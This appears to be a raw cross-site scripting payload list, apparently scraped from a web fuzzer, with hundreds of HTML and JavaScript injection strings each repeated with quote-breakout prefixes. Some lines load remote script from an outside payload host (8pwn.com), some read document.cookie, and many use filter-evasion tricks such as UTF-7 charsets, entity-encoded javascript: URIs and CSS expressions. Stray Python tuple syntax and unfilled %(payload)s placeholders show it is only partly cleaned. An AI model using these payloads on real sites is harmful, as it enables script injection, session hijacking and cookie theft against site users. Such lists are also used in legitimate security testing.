"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo&#10;;color:red;';">X
"><div style="font-family:'foo&#10;;color:red;';">X
'><div style="font-family:'foo&#10;;color:red;';">X
<div style="font-family:foo}color=red;">X
"><div style="font-family:foo}color=red;">X
'><div style="font-family:foo}color=red;">X
<// style=x:expression\28javascript:alert(1)\29>
"><// style=x:expression\28javascript:alert(1)\29>
'><// style=x:expression\28javascript:alert(1)\29>
<style>*{x:??????????(javascript:alert(1))}</style>
"><style>*{x:??????????(javascript:alert(1))}</style>
'><style>*{x:??????????(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
"><div style=content:url(%(svg)s)></div>
'><div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
"><div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
'><div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
"><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
'><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
"><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
'><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">X</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
"><div id="x">X</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
'><div id="x">X</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
<x style="background:url('x&#1;;color:red;/*')">X</x>
"><x style="background:url('x&#1;;color:red;/*')">X</x>
'><x style="background:url('x&#1;;color:red;/*')">X</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
"><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
'><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
"><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
'><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
"><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
'><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
'><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
'><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">?script?javascript:alert(1)?/script?
"><meta charset="mac-farsi">?script?javascript:alert(1)?/script?
'><meta charset="mac-farsi">?script?javascript:alert(1)?/script?
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
"><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
'><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
"><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
'><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
<x style="behavior:url(%(sct)s)">
"><x style="behavior:url(%(sct)s)">
'><x style="behavior:url(%(sct)s)">
<xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
"><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
'><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
"><event-source src="%(event)s" onload="javascript:alert(1)">
'><event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
"><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
'><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
'><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
<script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>
"><script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>
'><script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>
<script src=%(jscript)s></script>
"><script src=%(jscript)s></script>
'><script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
"><script language='javascript' src='%(jscript)s'></script>
'><script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
"><IMG SRC="javascript:javascript:alert(1);">
'><IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
"><IMG SRC=javascript:javascript:alert(1)>
'><IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
"><IMG SRC=`javascript:javascript:alert(1)`>
'><IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
"><SCRIPT SRC=%(jscript)s?<B>
'><SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
"><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
'><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
"><BODY ONLOAD=javascript:alert(1)>
'><BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
"><BODY ONLOAD=javascript:javascript:alert(1)>
'><BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav	ascript:javascript:alert(1);">
"><IMG SRC="jav	ascript:javascript:alert(1);">
'><IMG SRC="jav	ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
"><BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
'><BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
"><SCRIPT/SRC="%(jscript)s"></SCRIPT>
'><SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
"><<SCRIPT>%(payload)s//<</SCRIPT>
'><<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
"><IMG SRC="javascript:javascript:alert(1)"
'><IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
"><iframe src=%(scriptlet)s <
'><iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
"><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
'><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
"><IMG DYNSRC="javascript:javascript:alert(1)">
'><IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
"><IMG LOWSRC="javascript:javascript:alert(1)">
'><IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
"><BGSOUND SRC="javascript:javascript:alert(1);">
'><BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
"><BR SIZE="&{javascript:alert(1)}">
'><BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
"><LAYER SRC="%(scriptlet)s"></LAYER>
'><LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
"><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
'><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
"><STYLE>@import'%(css)s';</STYLE>
'><STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
"><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
'><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<X STYLE="behavior: url(%(htc)s);">
"><X STYLE="behavior: url(%(htc)s);">
'><X STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
"><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
'><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
"><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
'><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
"><TABLE BACKGROUND="javascript:javascript:alert(1)">
'><TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
"><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
'><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
"><DIV STYLE="background-image: url(javascript:javascript:alert(1))">
'><DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
"><DIV STYLE="width:expression(javascript:alert(1));">
'><DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
"><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
'><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
<X STYLE="X:expression(javascript:alert(1))">
"><X STYLE="X:expression(javascript:alert(1))">
'><X STYLE="X:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
"><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
'><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
"><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
'><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
"><A CLASS=X></A>
'><A CLASS=X></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
"><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
'><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
"><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
'><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
"><BASE HREF="javascript:javascript:alert(1);//">
'><BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
"><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
'><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
'><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
"><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
'><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
"><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
'><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
"><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
'><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
"><SCRIPT SRC="%(jpg)s"></SCRIPT>
'><SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
"><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
'><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
"><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
'><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
"><P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
'><P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
"><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
'><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
"><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
'><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
"><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
'><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
"><style onreadystatechange=javascript:javascript:alert(1);></style>
'><style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
"><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
'><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
"><embed code=%(scriptlet)s></embed>
'><embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
"><embed code=javascript:javascript:alert(1);></embed>
'><embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
"><embed src=%(jscript)s></embed>
'><embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
"><frameset onload=javascript:javascript:alert(1)></frameset>
'><frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
"><object onerror=javascript:javascript:alert(1)>
'><object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
"><embed type="image" src=%(scriptlet)s></embed>
'><embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
"><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
'><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
"><IMG SRC=&{javascript:alert(1);};>
'><IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
"><a href="jav&#65ascript:javascript:alert(1)">test1</a>
'><a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
"><a href="jav&#97ascript:javascript:alert(1)">test1</a>
'><a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>
"><script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>
'><script>%(payload)s</script>
</ScrIpt><script>%(payload)s</script>"></embed>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
"><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
'><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>
"><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>
'><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>
<SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>
"><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>
'><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>
<IMG SRC="javascript:alert('X');">
"><IMG SRC="javascript:alert('X');">
'><IMG SRC="javascript:alert('X');">
<IMG SRC=javascript:alert('X')>
"><IMG SRC=javascript:alert('X')>
'><IMG SRC=javascript:alert('X')>
<IMG SRC=JaVaScRiPt:alert('X')>
"><IMG SRC=JaVaScRiPt:alert('X')>
'><IMG SRC=JaVaScRiPt:alert('X')>
<IMG SRC=javascript:alert("X")>
"><IMG SRC=javascript:alert("X")>
'><IMG SRC=javascript:alert("X")>
<IMG SRC=`javascript:alert("X says, 'X'")`>
"><IMG SRC=`javascript:alert("X says, 'X'")`>
'><IMG SRC=`javascript:alert("X says, 'X'")`>
<a onmouseover="alert(document.cookie)">X link</a>
"><a onmouseover="alert(document.cookie)">X link</a>
'><a onmouseover="alert(document.cookie)">X link</a>
<a onmouseover=alert(document.cookie)>X link</a>
"><a onmouseover=alert(document.cookie)>X link</a>
'><a onmouseover=alert(document.cookie)>X link</a>
<IMG """><SCRIPT>alert("X")</SCRIPT>">
"><IMG """><SCRIPT>alert("X")</SCRIPT>">
'><IMG """><SCRIPT>alert("X")</SCRIPT>">
<IMG SRC= onmouseover="alert('X')">
"><IMG SRC= onmouseover="alert('X')">
'><IMG SRC= onmouseover="alert('X')">
<IMG onmouseover="alert('X')">
"><IMG onmouseover="alert('X')">
'><IMG onmouseover="alert('X')">
<IMG SRC="jav&#x09;ascript:alert('X');">
"><IMG SRC="jav&#x09;ascript:alert('X');">
'><IMG SRC="jav&#x09;ascript:alert('X');">
<IMG SRC="jav&#x0D;ascript:alert('X');">
"><IMG SRC="jav&#x0D;ascript:alert('X');">
'><IMG SRC="jav&#x0D;ascript:alert('X');">
perl -e 'print "<IMG SRC=java\0script:alert(\"X\")>";' > out
<IMG SRC=" &#14;  javascript:alert('X');">
"><IMG SRC=" &#14;  javascript:alert('X');">
'><IMG SRC=" &#14;  javascript:alert('X');">
<SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT/X SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT/SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<<SCRIPT>alert("X");//<</SCRIPT>
"><<SCRIPT>alert("X");//<</SCRIPT>
'><<SCRIPT>alert("X");//<</SCRIPT>
<SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js< B >
"><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js< B >
'><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/X.js< B >
<SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp< B >
"><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp< B >
'><SCRIPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp< B >
<SCRIPT SRC=//8pwn.com/xss_serve_payloads/.j>
"><SCRIPT SRC=//8pwn.com/xss_serve_payloads/.j>
'><SCRIPT SRC=//8pwn.com/xss_serve_payloads/.j>
<IMG SRC="javascript:alert('X')"
"><IMG SRC="javascript:alert('X')"
'><IMG SRC="javascript:alert('X')"
</TITLE><SCRIPT>alert("X");</SCRIPT>
"></TITLE><SCRIPT>alert("X");</SCRIPT>
'></TITLE><SCRIPT>alert("X");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
"><INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
'><INPUT TYPE="IMAGE" SRC="javascript:alert('X');">
<BODY BACKGROUND="javascript:alert('X')">
"><BODY BACKGROUND="javascript:alert('X')">
'><BODY BACKGROUND="javascript:alert('X')">
<IMG DYNSRC="javascript:alert('X')">
"><IMG DYNSRC="javascript:alert('X')">
'><IMG DYNSRC="javascript:alert('X')">
<IMG LOWSRC="javascript:alert('X')">
"><IMG LOWSRC="javascript:alert('X')">
'><IMG LOWSRC="javascript:alert('X')">
